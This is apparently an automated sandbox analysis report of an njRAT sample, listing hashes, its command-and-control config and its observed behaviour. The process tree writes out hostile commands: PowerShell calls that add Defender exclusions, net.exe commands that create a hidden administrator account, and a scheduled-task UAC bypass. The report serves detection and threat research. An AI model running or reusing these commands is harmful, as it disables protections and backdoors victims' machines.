Analysis
-
max time kernel
148s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system -
submitted
01/09/2022, 06:51
Static task
static1
Behavioral task
behavioral1
Sample
6a6b2af0716cb8308dddae55dd325253.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
6a6b2af0716cb8308dddae55dd325253.exe
Resource
win10v2004-20220812-en
General
-
Target
6a6b2af0716cb8308dddae55dd325253.exe
-
Size
1.4MB
-
MD5
6a6b2af0716cb8308dddae55dd325253
-
SHA1
691556a82280d270bd0f763f1213b43c6c4c0b6d
-
SHA256
2cb6acd25b8d00468dd89658dc948836f92000e031085b6b3c798eb1504157df
-
SHA512
e517c7070e4c20eb16acc1dfa98c016a01a9fc66b1944c30e5270d3e616770804553140ff5b3b35c49c659b39e59cf999dc8fa5c00e9520bd57e6c9872d83f11
-
SSDEEP
24576:BxDQqQS0hvzxBbNLWYhMehi1VH/mUwz9md3Nz1OPSvu+1SHgYxw4d+q:BxQSEbBhMe+VOVBmfxfu+1SH1w40
Malware Config
Extracted
njrat
0.7NC
NYAN CAT
4Mekey.myftp.biz:2411
18951a269d7
-
reg_key
18951a269d7
-
splitter
@!#&^%$
Signatures
-
UAC bypass
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6a6b2af0716cb8308dddae55dd325253.exe -
Windows security bypass
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Extensions\exe = "1" 6a6b2af0716cb8308dddae55dd325253.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe = "0" 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe = "0" 6a6b2af0716cb8308dddae55dd325253.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Extensions 6a6b2af0716cb8308dddae55dd325253.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions 6a6b2af0716cb8308dddae55dd325253.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools 6a6b2af0716cb8308dddae55dd325253.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6a6b2af0716cb8308dddae55dd325253.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6a6b2af0716cb8308dddae55dd325253.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 6a6b2af0716cb8308dddae55dd325253.exe -
Windows security modification
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 6a6b2af0716cb8308dddae55dd325253.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe = "0" 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe = "0" 6a6b2af0716cb8308dddae55dd325253.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Extensions 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Extensions\exe = "1" 6a6b2af0716cb8308dddae55dd325253.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ROCKS = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\6a6b2af0716cb8308dddae55dd325253.exe\"" 6a6b2af0716cb8308dddae55dd325253.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rF0bq16 = "C:\\Windows\\Microsoft.NET\\Framework\\b9xe33Q\\svchost.exe" 6a6b2af0716cb8308dddae55dd325253.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\rF0bq16 = "C:\\Windows\\Microsoft.NET\\Framework\\b9xe33Q\\svchost.exe" 6a6b2af0716cb8308dddae55dd325253.exe -
Checks whether UAC is enabled
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6a6b2af0716cb8308dddae55dd325253.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6a6b2af0716cb8308dddae55dd325253.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum 6a6b2af0716cb8308dddae55dd325253.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 6a6b2af0716cb8308dddae55dd325253.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4920 set thread context of 2236 4920 6a6b2af0716cb8308dddae55dd325253.exe 111 -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Microsoft.NET\Framework\b9xe33Q 6a6b2af0716cb8308dddae55dd325253.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\w6qHIwG.raw 6a6b2af0716cb8308dddae55dd325253.exe File created C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe 6a6b2af0716cb8308dddae55dd325253.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 4920 6a6b2af0716cb8308dddae55dd325253.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 4768 powershell.exe 4768 powershell.exe 368 powershell.exe 2380 powershell.exe 3228 powershell.exe 3152 powershell.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 368 powershell.exe 1804 powershell.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 1932 powershell.exe 2380 powershell.exe 3228 powershell.exe 3152 powershell.exe 3152 powershell.exe 1804 powershell.exe 1804 powershell.exe 1932 powershell.exe 1932 powershell.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe 4920 6a6b2af0716cb8308dddae55dd325253.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeDebugPrivilege 4920 6a6b2af0716cb8308dddae55dd325253.exe Token: SeDebugPrivilege 4768 powershell.exe Token: SeDebugPrivilege 368 powershell.exe Token: SeDebugPrivilege 2380 powershell.exe Token: SeDebugPrivilege 3228 powershell.exe Token: SeDebugPrivilege 3152 powershell.exe Token: SeDebugPrivilege 1804 powershell.exe Token: SeDebugPrivilege 1932 powershell.exe Token: SeDebugPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe Token: 33 2236 RegSvcs.exe Token: SeIncBasePriorityPrivilege 2236 RegSvcs.exe -
Suspicious use of WriteProcessMemory 58 IoCs
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6a6b2af0716cb8308dddae55dd325253.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe"C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe"1⤵
- UAC bypass
- Windows security bypass
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Checks computer location settings
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add2⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add3⤵PID:1104
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add2⤵
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators ADMIN~1 /add3⤵PID:2108
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup users "Admin" /add2⤵
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup users "Admin" /add3⤵PID:2664
-
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup administrators "Admin" /del2⤵
- Suspicious use of WriteProcessMemory
PID:344 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators "Admin" /del3⤵PID:1076
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I2⤵PID:4496
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:368
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\b9xe33Q\svchost.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3152
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension "exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6a6b2af0716cb8308dddae55dd325253.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"2⤵PID:4256
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
Network
MITRE ATT&CK Enterprise v6
Downloads